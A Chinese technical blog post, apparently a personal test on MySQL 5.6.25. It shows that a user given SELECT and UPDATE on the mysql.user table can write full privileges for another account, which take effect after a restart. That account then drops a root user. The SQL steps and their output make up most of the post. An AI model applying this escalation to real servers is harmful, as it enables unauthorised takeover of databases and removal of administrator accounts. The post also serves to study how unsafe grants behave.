温馨提示:
一次成功的非法提权,需要的必备条件是:
1、对mysql权限表的查、改权限;
2、一次不经意的数据库服务器重启;
此次测试版本:5.6.25
准备邪恶用户:
grant update on mysql.user to heike@'localhost' identified by 'heike';
用heike@localhost登录数据库;
mysql> select * from user;
ERROR 1142 (42000): SELECT command denied to user 'heike'@'localhost' for table 'user'
mysql> update mysql.user set user='test003' where user='test03';
ERROR 1143 (42000): SELECT command denied to user 'heike'@'localhost' for column 'user' in table 'user'
好吧,失败,在给heike@localhost关于user表的select权限;
mysql> grant select on mysql.user to heike@'localhost' identified by 'heike';
Query OK, 0 rows affected (0.00 sec)
现在heike@localhost可以正常地访问mysql.user表了。
准备测试用户:
mysql> show grants for test02@'localhost';
+---------------------------------------------------------------------------------------------------------------+
| Grants for test02@localhost |
+---------------------------------------------------------------------------------------------------------------+
| GRANT USAGE ON *.* TO 'test02'@'localhost' IDENTIFIED BY PASSWORD '*1556A6F65259CE3FBEA8489096F7797B4E0D5BEC' |
| GRANT SELECT ON `db_test`.`t1` TO 'test02'@'localhost' |
+---------------------------------------------------------------------------------------------------------------+
2 rows in set (0.00 sec)
test02@'localhost'只有查询db_test库t1表的权限
现在开始用heike@localhost给test02@'localhost'提权。
就给test02@'localhost'一个超大的权限吧。使用heike@localhost执行:
update mysql.user set Select_priv='Y',
Insert_priv='Y',
Update_priv='Y',
Delete_priv='Y',
Create_priv='Y',
Drop_priv='Y',
Reload_priv='Y',
Shutdown_priv='Y',
Process_priv='Y',
File_priv='Y',
Grant_priv='Y',
References_priv='Y',
Index_priv='Y',
Alter_priv='Y',
Show_db_priv='Y',
Super_priv='Y',
Create_tmp_table_priv='Y',
Lock_tables_priv='Y',
Execute_priv='Y',
Repl_slave_priv='Y',
Repl_client_priv='Y',
Create_view_priv='Y',
Show_view_priv='Y',
Create_routine_priv='Y',
Alter_routine_priv='Y',
Create_user_priv='Y',
Event_priv='Y',
Trigger_priv='Y',
Create_tablespace_priv='Y'
where user='test02' and host='localhost';
Query OK, 1 row affected (0.04 sec)
Rows matched: 1 Changed: 1 Warnings: 0
但是再查看test02@localhost的权限
+----------------------------------------------------------------------------+
| Grants for test02@localhost |
+----------------------------------------------------------------------------+
| GRANT USAGE ON *.* TO 'test02'@'localhost' IDENTIFIED BY PASSWORD <secret> |
| GRANT SELECT ON `db_test`.`t1` TO 'test02'@'localhost' |
+----------------------------------------------------------------------------+
2 rows in set (0.00 sec)
好吧,权限没变。但是不要灰心
让我们静静地等在在某一天,有flush privileges 权限的用户执行下:
mysql>flush privileges;
这时再看看test02@localhost的权限
mysql> show grants for test02@localhost;
+-------------------------------------------------------------------------------------------------------+
| Grants for test02@localhost |
+-------------------------------------------------------------------------------------------------------+
| GRANT ALL PRIVILEGES ON *.* TO 'test02'@'localhost' IDENTIFIED BY PASSWORD <secret> WITH GRANT OPTION |
| GRANT SELECT ON `db_test`.`t1` TO 'test02'@'localhost' |
+-------------------------------------------------------------------------------------------------------+
2 rows in set (0.00 sec)
这是你是不是觉得test02@localhost已经成功逆袭为高富帅了?
既然你这么以为,就让他把`db_test`.`t1`删掉吧
mysql> drop table db_test.t1;
ERROR 1142 (42000): DROP command denied to user 'test02'@'localhost' for table 't1'
What!居然不能删除,还提示权限不足。这一定是误会,让我再尝试一下:
mysql> select user,host,password from mysql.user;
ERROR 1142 (42000): SELECT command denied to user 'test02'@'localhost' for table 'user'
what!连查询都不行,说好的ALL PRIVILEGES呢!
让我再尝试一下,新建一张普通表t2看test02@localhost能访问不。
mysql> select * from db_test.t2;
ERROR 1142 (42000): SELECT command denied to user 'test02'@'localhost' for table 't2'
好吧,至此'test02'@'localhost'的权限没有丝毫改变
继而重启服务器
>service mysqld restart
再试试:
mysql> drop user root@'::1';
Query OK, 0 rows affected (0.08 sec)
mysql> select user();
+------------------+
| user() |
+------------------+
| test02@localhost |
+------------------+
1 row in set (0.00 sec)
哈哈!看看。此时的test02@localhost已经将root用户干掉了!